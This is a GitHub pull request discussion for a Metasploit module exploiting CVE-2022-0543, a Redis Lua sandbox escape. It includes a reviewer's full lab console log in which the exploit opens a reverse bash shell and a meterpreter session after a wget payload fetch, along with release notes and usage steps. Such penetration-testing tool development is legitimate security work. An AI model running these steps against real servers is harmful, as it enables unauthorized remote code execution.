New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Redis Sandbox Escape RCE (CVE-2022-0543) #16504
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Just a couple minor suggestions. Got it tested without auth:
Output
msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > options
Module options (exploit/linux/redis/redis_debian_sandbox_escape):
Name Current Setting Required Description
---- --------------- -------- -----------
LUA_LIB /usr/lib/x86_64-linux-gnu/lib yes LUA library path
lua5.1.so.0
PASSWORD mypassword no Redis AUTH password
RHOSTS yes The target host(s), see https://github.com/rapid7/me
tasploit-framework/wiki/Using-Metasploit
RPORT 6379 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. Th
is must be an address on the local machine or 0.0.0.
0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randoml
y generated)
TARGETURI / yes Base path
THREADS 1 yes The number of concurrent threads (max one per host)
URIPATH no The URI to use for this exploit (default is random)
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set rhost 192.168.140.140
rhost => 192.168.140.140
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] 192.168.140.140:6379 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379 - Executing Unix Command for cmd/unix/reverse_bash
[+] 192.168.140.140:6379 - Exploit complete!
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.140:48772 ) at 2022-04-26 13:24:42 -0500
id
uid=126(redis) gid=133(redis) groups=133(redis)
uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N] y
[*] 192.168.140.140 - Command shell session 1 closed. Reason: User exit
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set target 1
target => 1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] 192.168.140.140:6379 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379 - Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
[*] 192.168.140.140:6379 - Using URL: http://192.168.140.1:8080/963M5aN
[*] 192.168.140.140:6379 - Client 192.168.140.140 (Wget/1.20.3 (linux-gnu)) requested /963M5aN
[*] 192.168.140.140:6379 - Sending payload to 192.168.140.140 (Wget/1.20.3 (linux-gnu))
[+] 192.168.140.140:6379 - Exploit complete!
[*] 192.168.140.140:6379 - Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.140:48774 ) at 2022-04-26 13:24:59 -0500
[*] 192.168.140.140:6379 - Server stopped.
meterpreter > getuid
Server username: redis
meterpreter > sysinfo
Computer : 192.168.140.140
OS : Ubuntu 20.04 (Linux 5.13.0-40-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
documentation/modules/exploit/linux/redis/redis_debian_sandbox_escape.md
Outdated
Show resolved
Hide resolved
…_escape.md Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
# Before we get crazy sending exploits over the wire, let's just check if this could | ||
# plausiably be a vulnerable version. Using INFO we can check for: | ||
# | ||
# 1. 4 < Version < 6.1 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Maybe order those in the same orders as the actual checks done bellow?
Release NotesThis exploit achieves remote code execution as the |
This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. This has been exploited in the wild. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.
On a typical
redis
deployment (not docker), this module achieves execution as theredis
user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload.Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64 (mostly due to the lack of test targets), which is likely to be the most popular version.
Failed Linting
I expect this to fail linting due to the
has_check?
call. However, this is required. See #13143Other Weird Things
As mentioned above, the default Meterpreter is stageless due to the use of "MemoryDenyWriteExecute" otherwise causing the staged version to crash on failed mprotect. Technically, the Docker version could execute a staged Meterpreter but there is also no command stager (other than printf/echo and I don't want to make those options since they won't work in the normal case). And I guess I should clarify that means that
target 1
does not work against the Docker target but does work against a normal Ubuntu install. I think this is fine since actually exploitable targets in the wild, in my opinion, are far more likely to be non-Docker targets.Verification
Follow the setup steps in the documentation.
use exploit/linux/redis/redis_debian_sandbox_escape
set RHOST <ip>
set LHOST <ip>
set PASSWORD <password>
check
run
PoC Video || GTFO
https://www.youtube.com/watch?v=N5J7laXlMuo
PCAP || GTFO
redis_exploitation.zip